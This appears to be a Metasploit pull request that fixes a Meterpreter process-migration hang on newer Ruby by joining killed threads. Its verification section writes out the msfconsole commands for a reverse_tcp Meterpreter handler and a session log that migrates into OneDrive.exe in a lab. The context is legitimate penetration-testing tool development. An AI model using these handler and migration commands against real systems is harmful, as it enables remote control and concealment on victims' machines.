### PR TITLE
Fix process migration on reverse_tcp meterpreter sessions w/ newer Ruby

### DIFF
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -343,7 +343,7 @@ class ClientCore < Extension
     unless commands.length > 0
       image = nil
       path = nil
-      # If client.sys isn't setup, it's a Windows meterpreter 
+      # If client.sys isn't setup, it's a Windows meterpreter
       if client.respond_to?(:sys) && !client.sys.config.sysinfo['BuildTuple'].blank?
         # Query the payload gem directly for the extension image
         image = MetasploitPayloads::Mettle.load_extension(client.sys.config.sysinfo['BuildTuple'], mod.downcase, suffix)
@@ -688,7 +688,7 @@ class ClientCore < Extension
     end
 
     # Renegotiate TLV encryption on the migrated session
-    client.tlv_enc_key = negotiate_tlv_encryption
+    secure
 
     # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
     client.ext.aliases.keys.each { |e|

--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -429,11 +429,13 @@ module PacketDispatcher
   def monitor_stop
     if self.receiver_thread
       self.receiver_thread.kill
+      self.receiver_thread.join
       self.receiver_thread = nil
     end
 
     if self.dispatcher_thread
       self.dispatcher_thread.kill
+      self.dispatcher_thread.join
       self.dispatcher_thread = nil
     end
   end


### PR DESCRIPTION
This fixes #12390, a bug where Meterpreter process migration with reverse_tcp would hang on newer versions of Ruby (since Ruby 2.5.5). This appears to be due to an assumption in the MSF code that killing a thread is a synchronous operation, when it needs a .join to ensure the thread has exited before continuing. Ruby 2.5.5 may have introduced stronger guarantees that the system would continue with the context of the main thread for a bit longer than before after calling '.kill' on a child thread.

Earlier iterations of this patch sprinked ::Thread.pass around for a similar effect, which likely just bought enough time for the child threads to exit on their own. This makes it explicit.

There is opportunity to hunt for more bugs of this class with `git grep "thread = nil"`

## Verification

List the steps needed to make sure this thing works

- [x] Start `./msfconsole -qx 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.56.1; run'` or get a reverse_tcp session somehow
- [x] `migrate -N OneDrive.exe` or whatever your preference is
- [x] **Verify** the migration runs reliably
- [x] **Verify** it doesn't hang or timeout

```
$ ./msfconsole -qx 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.56.1; run'
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.56.1
[*] Started reverse TCP handler on 192.168.56.1:4444 

[*] Sending stage (180291 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:50091) at 2019-10-28 06:19:34 -0500

meterpreter > 
meterpreter > 
meterpreter > migrate -N OneDrive.exe
[*] Migrating from 7188 to 3632...
[*] Migration completed successfully.
```
